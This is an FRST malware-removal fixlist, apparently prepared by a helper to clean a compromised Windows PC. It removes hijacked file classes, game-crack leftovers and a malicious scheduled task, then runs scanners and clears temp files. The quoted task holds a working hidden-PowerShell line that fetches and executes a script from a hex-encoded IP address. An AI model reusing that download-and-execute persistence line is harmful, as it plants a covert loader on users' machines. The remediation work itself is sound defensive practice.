Start
SystemRestore: On
CreateRestorePoint:
CloseProcesses:
Comment: The next four entries are per-user overrides of the regfile, .reg, .bat and .cmd file classes that FRST flagged. Overrides like these can keep registry and batch files from opening normally, which would hinder manual cleanup (intent inferred; the log shows only that the keys exist).
HKU\S-1-5-21-1758440541-3978537159-2615947404-1001\Software\Classes\regfile: <==== ATTENTION
HKU\S-1-5-21-1758440541-3978537159-2615947404-1001\Software\Classes\.reg: => <==== ATTENTION
HKU\S-1-5-21-1758440541-3978537159-2615947404-1001\Software\Classes\.bat: => <==== ATTENTION
HKU\S-1-5-21-1758440541-3978537159-2615947404-1001\Software\Classes\.cmd: => <==== ATTENTION
Comment: The task below is the persistence entry. It uses the signed conhost.exe with --headless to start a windowless PowerShell that downloads a script (irm) and runs it in memory (iex), so the payload itself is not visible in this log. The host is written as hex octets: 0x87.0xB5.0x5B.0xF6 is 135.181.91.246. Search proxy, DNS and firewall logs for both forms and block the address. Treat credentials and session tokens used on this machine as exposed.
Task: {6EC52DD6-EE4F-40A8-8D73-3F8C37DA369F} - System32\Tasks\InteractiveServices\SystemTextRegularExpressionsTask.CL-NCLS-1-5-21-1758440541-3978537159-2615947404-1001 => C:\Windows\System32\conhost.exe [1011712 2026-05-13] (Microsoft Windows -> Microsoft Corporation) -> --headless powershell -NoProfile -ExecutionPolicy Bypass -Command "irm 0x87.0xB5.0x5B.0xF6/a | iex" <==== ATTENTION
Comment: The InteractiveServices task folder was created 2026-06-10 22:39 per the entry below; that timestamp is a starting point for building the infection timeline.
2026-06-10 22:39 - 2026-06-10 22:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\InteractiveServices
2026-06-11 00:55 - 2026-03-15 00:16 - 000000000 ____D C:\Users\paulg\AppData\Roaming\RenPy
CustomCLSID: HKU\S-1-5-21-1758440541-3978537159-2615947404-1001_Classes\CLSID\{ea412386-9d9a-437a-8ba5-1988ba62ed41}\localserver32 -> "C:\WINDOWS\System32\DriverStore\FileRepository\aispeechapo.inf_amd64_9ae1c2ca003d06fe\AispeechAudioNotify.exe" -ToastActivated => No File
AlternateDataStreams: C:\WINDOWS\tracing:? [16]
AlternateDataStreams: C:\Users\paulg\Application Data:3475e5013ba77da78776dee34d3bcb36 [394]
AlternateDataStreams: C:\Users\paulg\AppData\Roaming:3475e5013ba77da78776dee34d3bcb36 [394]
FirewallRules: [{C81D00F8-09F6-4251-B7D2-1E315A043CB4}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{CFEE3FD9-4DF1-4339-85C3-E69865A7FCBF}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => No File
FirewallRules: [{4E1FCB44-64E6-4D61-9906-566032017C8C}] => (Allow) C:\Program Files\Epic Games\InfinityNikkiEpicLauncher\1.2.0\xstarter.exe => No File
FirewallRules: [{7E067B54-C9CA-47DA-9DA5-26E38E1741FC}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{489528DB-0B92-45BD-B59B-B38A384F2D2D}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{07CB15DA-37E5-40CB-BC65-AA6292340754}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{B8CA7F76-51D8-4302-96C8-91708599B270}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{045C0A21-DD4E-4274-97D3-57FC60588D2F}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{BC0EA924-7272-4C09-8415-37E83A9B0700}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{DBADA8BE-C3F0-4B95-AF5F-8ACB648D8126}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{15FE8AB6-7697-42BF-BD69-992FFF79127C}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{5E7C3D91-BDCE-4929-A2E4-745550F1042C}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{84DD252D-0BDF-4C9A-A1A9-6DCFE579C7C1}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{F45FF6DD-45F1-4EEB-918D-745A42060019}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{5A570944-89E3-42B9-8D5C-3E4E084C8BBA}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{4B024A9A-CDF7-46FC-9B94-C5D61D203AC8}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{97029EBB-2648-4B6B-B5C7-AC67B04F2686}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{8CB8D689-04D2-4EFB-A9AB-D63A1AAB40FD}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{62831DFB-A251-46ED-B449-0A49FECF5F18}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{3A732B6E-3DB1-4A2E-8004-C63D952AD5D6}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{28DB9FB4-4517-4B8B-BB1C-D66856F94AC7}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{CD57291A-CF11-4B7D-816A-54D93270D72D}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{70BFE003-B7DE-4EC7-8E19-F319B9F20C48}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [TCP Query User{D8BF2B6A-E276-4242-AD3C-29ECF806BCCC}C:\games\chrono.trigger.build.1189005.steamgg.net\chrono.trigger.build.11890051\chrono trigger.exe] => (Block) C:\games\chrono.trigger.build.1189005.steamgg.net\chrono.trigger.build.11890051\chrono trigger.exe => No File
FirewallRules: [UDP Query User{5D440676-D40F-425E-BEFA-E3D23766796B}C:\games\chrono.trigger.build.1189005.steamgg.net\chrono.trigger.build.11890051\chrono trigger.exe] => (Block) C:\games\chrono.trigger.build.1189005.steamgg.net\chrono.trigger.build.11890051\chrono trigger.exe => No File
FirewallRules: [{F4FA7028-4DC4-40AF-BC59-685FA211316E}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{12A897C5-C20F-43BA-A123-D44BD27D2A6F}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{CEC77C44-BBB9-4B69-9579-14EE90B8A6CE}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{74E18828-7482-4D5B-AE4E-69C6ECE04EDF}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{DAB668D8-91AC-4480-8326-7F345CA22BDB}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{00EAE0D8-C472-47EC-97D2-39596C4949E0}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{65484668-4304-4508-B258-F9304C24A64C}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{8693A6A8-93EC-40D9-99CA-AF6AC54CF5A0}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{0EA25D5D-4D81-4CA8-9BDB-5D888337957F}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{2A33449A-FF88-4510-8690-7FB8118389BE}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{5D3B1256-A4B0-4A66-BA6E-C028A6563BA2}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{437EC8BA-B9D3-4ED1-A6DD-804460947488}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{1FF0686C-4D09-471F-B5E5-A7F108CE611E}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{79D66017-693A-497C-AE4D-4D6C1C43A523}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{6C038B78-3C57-4912-8751-6A4245DE7531}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{452A283F-74AE-449A-AEA4-498C9D7E8737}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [{936D315C-598E-4802-83FA-9499A0B09524}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\X6Game\Binaries\Win64\X6Game-Win64-Shipping.exe => No File
FirewallRules: [{3AB5A4FE-B838-4AF2-8547-4599263C35CD}] => (Allow) C:\Games\Epic Games\Games\InfinityNikkiEpic\InfinityNikki.exe => No File
FirewallRules: [TCP Query User{A467EC16-5AC4-4C8A-9A08-D215D998BE67}D:\games lan\arena-fps\quake 3 lan\cnq3.exe] => (Allow) D:\games lan\arena-fps\quake 3 lan\cnq3.exe => No File
FirewallRules: [UDP Query User{337E94C5-E744-43BB-941F-A394D654539C}D:\games lan\arena-fps\quake 3 lan\cnq3.exe] => (Allow) D:\games lan\arena-fps\quake 3 lan\cnq3.exe => No File
FirewallRules: [TCP Query User{7DCE89CD-3E54-4DCA-B330-5EDD43399052}D:\games lan\arena-fps\quake 3 lan\quake3.exe] => (Allow) D:\games lan\arena-fps\quake 3 lan\quake3.exe => No File
FirewallRules: [UDP Query User{67C1493E-6641-42B1-B0CE-29BC395CC712}D:\games lan\arena-fps\quake 3 lan\quake3.exe] => (Allow) D:\games lan\arena-fps\quake 3 lan\quake3.exe => No File
FirewallRules: [TCP Query User{29CCBF65-9AD5-4DAB-A336-46B2A5618638}D:\games lan\fps\left 4 dead 2 2.1.3.5\left4dead2.exe] => (Allow) D:\games lan\fps\left 4 dead 2 2.1.3.5\left4dead2.exe => No File
FirewallRules: [UDP Query User{190B3051-AAF1-4F63-8DD4-5E47BECEC1BC}D:\games lan\fps\left 4 dead 2 2.1.3.5\left4dead2.exe] => (Allow) D:\games lan\fps\left 4 dead 2 2.1.3.5\left4dead2.exe => No File
FirewallRules: [TCP Query User{E36DCD44-F564-4945-93AE-81F3166A55A7}D:\games lan\fps\call of duty 2 v1.3.fix\cod2mp_s.exe] => (Allow) D:\games lan\fps\call of duty 2 v1.3.fix\cod2mp_s.exe => No File
FirewallRules: [UDP Query User{9D6A9A4C-0389-491D-A939-EC21428F8001}D:\games lan\fps\call of duty 2 v1.3.fix\cod2mp_s.exe] => (Allow) D:\games lan\fps\call of duty 2 v1.3.fix\cod2mp_s.exe => No File
FirewallRules: [TCP Query User{FAC850C4-BB60-4EDB-A604-E31E6178E756}D:\games lan\rts\warcraft iii 1.26 -iceblitz\war3.exe] => (Allow) D:\games lan\rts\warcraft iii 1.26 -iceblitz\war3.exe => No File
FirewallRules: [UDP Query User{F6DBA81C-29C8-4A7D-957B-05A5235FF9FC}D:\games lan\rts\warcraft iii 1.26 -iceblitz\war3.exe] => (Allow) D:\games lan\rts\warcraft iii 1.26 -iceblitz\war3.exe => No File
FirewallRules: [{8497E1F7-1CB0-4F7D-A4CD-A3330440D9C2}] => (Block) C:\Users\paulg\AppData\Local\Temp\nsz6A14.tmp\left4dead2.dll => No File
FirewallRules: [{B7238883-0D72-4306-B2D2-39F6891F5767}] => (Block) C:\Users\paulg\AppData\Local\Temp\nsz6A14.tmp\left4dead2.exe => No File
FirewallRules: [TCP Query User{9F64FAD2-0211-4D9C-A588-5D297DAACA3C}D:\games lan\fps\killing floor\system\killingfloor.exe] => (Allow) D:\games lan\fps\killing floor\system\killingfloor.exe => No File
FirewallRules: [UDP Query User{9A7C49AB-B4AF-4335-88BC-E4A5BF051409}D:\games lan\fps\killing floor\system\killingfloor.exe] => (Allow) D:\games lan\fps\killing floor\system\killingfloor.exe => No File
HKU\S-1-5-21-1758440541-3978537159-2615947404-1001\...\Run: [GalaxyClient] => [X]
Task: {B4AA8F1D-0093-4384-A3E5-E41ED730E08B} - System32\Tasks\Lenovo\Vantage\StartupFixPlan => C:\Program Files (x86)\Lenovo\VantageService\4.2.24.0\\uninstall.exe /repair (No File)
Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (No File)
S3 MpKsl3d3b128a; \??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{B0174D3A-F475-437C-8363-8D8E22F92686}\MpKslDrv.sys (No File)
S4 NvModuleTracker; \SystemRoot\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_ea6cec41fc5b2a8b\NvModuleTracker.sys (No File)
Task: {9B13BA48-2765-4659-8F62-225D34A49601} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_ERROR_HB => C:\Windows\System32\MRT.exe [222431176 2026-06-10] (Microsoft Windows -> Microsoft Corporation) -> C:\WINDOWS\system32\/EHB /HeartbeatFailure "SubmitHeartbeatReportData" /HeartbeatError "0x80072ee7"
File: C:\Users\paulg\Downloads\FF7Rebirth Ultimate Unreal Engine.ini (No VRR)-3-125-1780930504.zip
Folder: C:\WINDOWS\system32\VRFCAT-Plugins
Folder: C:\Users\paulg\AppData\Roaming\game
Folder: C:\Users\paulg\AppData\Local\sakuragozen
Powershell: Get-ScheduledTask | select -first 30 | Get-ScheduledTaskInfo
Powershell: @("$env:APPDATA","$env:LOCALAPPDATA") | ForEach-Object { Get-ChildItem $_ -Recurse -Filter "index.js" -ErrorAction SilentlyContinue } | Where-Object { $_.FullName -match "discord_desktop_core" } | ForEach-Object { Write-Host "--- $($_.FullName) ---"; (Get-Content $_.FullName -Raw).Substring(0,[Math]::Min(2000,(Get-Content $_.FullName -Raw).Length)) }
Powershell: (Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -ErrorAction SilentlyContinue).PSObject.Properties | Where-Object { $_.Name -match "^[a-z]$" } | ForEach-Object { Write-Host "$($_.Name): $($_.Value)" }
C:\WINDOWS\Temp\*
C:\WINDOWS\SystemTemp\*
C:\Users\paulg\AppData\Local\Temp\*
StartPowerShell:
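# Downloads newest AdwCleaner version directly from Malwarebytes, performs an update, scans, cleans and writes the log in console
# Does not clean preinstalled objects, only PUP/Adware
# If you would like to delete preinstalled objects, add an argument /preinstalled to the /clean argument
# If you would like to only scan with it, change the argument from /clean to /scan
$adwDir  = "$env:SystemDrive\AdwCleaner"
$adwExe  = "$adwDir\AdwCleanerFRST.exe"
$logFile = "$adwDir\AdwCleanerOutputFRST.txt"
New-Item -ItemType Directory -Force -Path $adwDir | Out-Null
# -UseBasicParsing matches the other download snippets in this fixlist and avoids depending on the Internet Explorer engine in Windows PowerShell 5.1.
Invoke-WebRequest -Uri "https://adwcleaner.malwarebytes.com/adwcleaner?channel=release" -OutFile $adwExe -UseBasicParsing
# The download is about to run elevated on a machine that is already compromised, so it is not started unless its Authenticode signature validates.
# A failed download also lands here: the signature object is then empty and the status comparison fails.
$sig = Get-AuthenticodeSignature -FilePath $adwExe
if ($sig.Status -ne 'Valid') {
    Write-Host "AdwCleaner download rejected: signature status is '$($sig.Status)'"
    Remove-Item -Path $adwExe -Force -ErrorAction SilentlyContinue
    exit 1
}
# Printed so whoever reads the Fixlog can confirm the publisher; pinning the expected publisher here would be stronger still.
Write-Host "AdwCleaner signer: $($sig.SignerCertificate.Subject)"
# First run with /eula, before the cleaning run below.
Start-Process -FilePath $adwExe -ArgumentList "/eula" -Wait -WindowStyle Hidden
Start-Process -FilePath $adwExe -ArgumentList "/noreboot /clean" -Wait -WindowStyle Hidden -RedirectStandardOutput $logFile
Get-Content $logFile -Encoding Unicode
# The log has been echoed into the Fixlog, so the temporary copy is removed.
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue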
EndPowerShell:
StartPowershell:
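# Downloads HitmanPro from dl.surfright.nl, runs a scan-only pass without installing it and prints the text log.
# Replace /scanonly with /clean if you also want to delete items -- however, this will activate a trial license on the system, I do not recommend it
$hmpExe = "$env:TEMP\HitmanPro_x64.exe"
$logFile = "$env:TEMP\HitmanPro_ScanLog.txt"
Invoke-WebRequest -Uri "https://dl.surfright.nl/HitmanPro_x64.exe" -OutFile $hmpExe -UseBasicParsing
# $env:TEMP is user-writable and the scanner runs elevated, so the file is not started unless its Authenticode signature validates.
# A failed download also lands here: the signature object is then empty and the status comparison fails.
$sig = Get-AuthenticodeSignature -FilePath $hmpExe
if ($sig.Status -ne 'Valid') {
    Write-Host "HitmanPro download rejected: signature status is '$($sig.Status)'"
    Remove-Item -Path $hmpExe -Force -ErrorAction SilentlyContinue
    exit 1
}
# Printed so whoever reads the Fixlog can confirm the publisher; pinning the expected publisher here would be stronger still.
Write-Host "HitmanPro signer: $($sig.SignerCertificate.Subject)"
# A log left over from an earlier run would pass the existence check below and be printed as if it were this scan's result.
Remove-Item -Path $logFile -Force -ErrorAction SilentlyContinue
$proc = Start-Process $hmpExe -ArgumentList "/ews","/scanonly","/noinstall","/log=`"$logFile`"","/logtype=txt" -Wait -PassThru
if (!(Test-Path $logFile)) { Write-Host "Scan failed (exit $($proc.ExitCode))"; exit 1 }
Get-Content $logFile -Encoding Unicode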
EndPowershell:
StartPowerShell:
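# This snippet downloads Emsisoft Emergency Kit (EEK) from Emsisoft's official site, updates it and scans with it.
# Do note that the executable is 300MB and may take some time to download.
# ---
# This will scan for malware and PUPs in 1) system memory 2) important folders, as the documentation says
# It will scan in compressed archives, in mail archives, in NTFS alternate data streams and use cloud requests
# ---
# You can use argument "/delete" to delete found objects including references but this is permanent and irreversible.
# You can remove the "/quick" argument to do a full scan but that may take longer than what FRST can handle.
# You can use argument "/quarantine="[folder]"" to put found malware into quarantine, but I personally prefer first verifying the detections.
$downloadUrl = "https://dl.emsisoft.com/EmsisoftEmergencyKit.exe"
$systemDrive = $env:SystemDrive
$frstPath = "$systemDrive\FRST"
$savePath = "$frstPath\EEK.exe"
$extractPath = "$frstPath\EEK"
if (-not (Test-Path $frstPath)) {
    New-Item -Path $frstPath -ItemType Directory -Force | Out-Null
}
if (-not (Test-Path $extractPath)) {
    New-Item -Path $extractPath -ItemType Directory -Force | Out-Null
}
Invoke-WebRequest -Uri $downloadUrl -OutFile $savePath -UseBasicParsing
# The package is about to run elevated on a machine that is already compromised, so it is not started unless its Authenticode signature validates.
# A failed download also lands here: the signature object is then empty and the status comparison fails.
$sig = Get-AuthenticodeSignature -FilePath $savePath
if ($sig.Status -ne 'Valid') {
    Write-Host "EEK download rejected: signature status is '$($sig.Status)'"
    Remove-Item -Path $savePath -Force -ErrorAction SilentlyContinue
    exit 1
}
# Printed so whoever reads the Fixlog can confirm the publisher; pinning the expected publisher here would be stronger still.
Write-Host "EEK signer: $($sig.SignerCertificate.Subject)"
$proc = Start-Process -FilePath $savePath -ArgumentList "-s -d`"$extractPath`"" -PassThru
# Wait for the extractor to produce the scanner, but not forever: without a cap, a failed extraction would hang the whole fix.
# The 15-minute limit is an arbitrary ceiling; adjust it for slow disks.
$deadline = (Get-Date).AddMinutes(15)
while (-not (Test-Path "$extractPath\bin64\a2cmd.exe") -and (Get-Date) -lt $deadline) {
    Start-Sleep -Milliseconds 1000
}
# The extractor process is stopped once the scanner binary is present (or the wait timed out), as in the original flow.
Stop-Process -Id $proc.Id -Force -ErrorAction SilentlyContinue
if ([Environment]::Is64BitOperatingSystem) {
    $a2cmdPath = Join-Path $extractPath "bin64\a2cmd.exe"
} else {
    $a2cmdPath = Join-Path $extractPath "bin32\a2cmd.exe"
}
# Covers both the timeout above and a package that did not contain the scanner for this architecture.
if (-not (Test-Path $a2cmdPath)) {
    Write-Host "EEK extraction failed: $a2cmdPath not found"
    exit 1
}
Start-Process -FilePath $a2cmdPath -ArgumentList "/update" -Wait -NoNewWindow
Start-Process -FilePath $a2cmdPath -ArgumentList "/malware /quick /m /t /pup /a /am /cloud=1 /la=`"$frstPath\EEK_scan.log`"" -Wait -NoNewWindow
Get-Content "$frstPath\EEK_scan.log"
exit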
EndPowerShell:
cmd: del %temp%\*.* /f /s /q
cmd: rd /s /q %temp%
cmd: bitsadmin /reset /allusers
cmd: netsh winsock reset catalog
cmd: ipconfig /flushdns
RemoveProxy:
EmptyTemp:
End
Warning
Executing a Fixlist on the wrong system may permanently damage it. Continue only if this link was meant for you.